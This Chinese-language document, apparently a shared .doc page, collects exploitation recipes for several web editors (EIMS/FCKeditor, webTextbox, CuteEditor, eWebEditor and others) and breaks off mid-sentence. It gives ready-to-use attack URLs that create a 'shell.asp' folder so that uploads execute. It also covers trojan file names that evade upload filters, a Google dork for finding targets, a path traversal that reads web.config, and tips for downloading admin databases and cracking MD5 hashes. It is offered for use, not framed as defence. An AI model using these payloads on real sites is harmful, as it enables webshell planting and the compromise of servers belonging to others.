编辑器漏洞利用.docVIP

EIMS 编辑器漏洞 具体利用方法 他是分2.1 2.0 俩个版本 企业信息管理系统 eims_for_access_2.1 房产中介管理系统 eims_house_for_access_2.1 利用方法贴出 2.1版本 第一步 建立SHELL.ASP文件夹 /Include/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolderType=ImageCurrentFolder=%2Fshell.aspNewFolderName=zuuid=1244789975684 FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolderCurrentFolder=/Type=ImageNewFolderName=shell.asp 第二个 上传文件 /Include/FCKeditor/editor/filemanager/connectors/test.html# 2.0 只是在Fck在跟目录 FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolderType=ImageCurrentFolder=%2Fshell.aspNewFolderName=zuuid=1244789975684 FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolderCurrentFolder=/Type=ImageNewFolderName=shell.asp FCKeditor/editor/filemanager/connectors/test.html# webTextbox 编辑器 0day 谷歌搜索:inurl:system_dntb http://web/system_dntb/uploadimg.aspx UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/Upload/; 上传木马类型a.cdx;1.jpg a.asp;.jpg Cute Editor在线编辑器本地包含漏洞 漏洞描述： CuteEditor for ASP.NET是建立在Html基础之上，最简单易用、功能最强大的所见即所得A在线编辑器。 CuteEditor可以帮助A开发者轻松的对原来文本框(Textarea)中的内容(包括文字、图片等Html内容)进行编辑，更重要得是这些内容编辑的实现是所见即所得方式。 CuteEditor还集成了文件(包括图片、文档等)上传、媒体(包括视频、声音等)文件直接插入等对你来说非常实用的功能模块。 但是在 Load.ashx 文件中，未对 file 参数进行处理，可以加载任意文件。 官方地址： / / 利用方法： /CuteSoft_Client/CuteEditor/Load.ashx?type=imagefile=../../../web.config 小谈Ewebeditor编辑器各版本问题 首先我们来说下asp版本，如:/admin/ewebeditor/admin_login.asp，这是一个关于此的编辑器后台，用户名当然也是默认的，如果不对大家可以下载它的数据库试一试，或许能成功的解密MD5，类似： /ewebeditor/admin_login.asp /admin/eweb/admin_login.asp /admin/editor/admin_login.asp 主要看开发人员如何定义这个编辑器了，后台默认的数据是：.../db/ewebeditor.mdb 或者 .../db/ewebeditor.asp，如果破解不了md5，也可以看看其中的样式文件是否之前被入侵过，依前人的路调用样式就可以直接上传了 关于aspx的版本我在网上看见这样的一个漏洞，如下： ASPX版： 受影响文件：eWebEditorNet/upload.aspx 利用方法：添好本地的cer的Shell文件。在浏揽器输入javascript:lbtnUpload.click();就能得到shell 其实我更看重的是它的路径，ewebeditornet，跟其他版本小有区别，对这个版本的还需要继续去挖掘新的bug，这就不做过多的介绍了 良精网站编辑器 通过upfile_other.asp漏洞文件直接取SHELL 直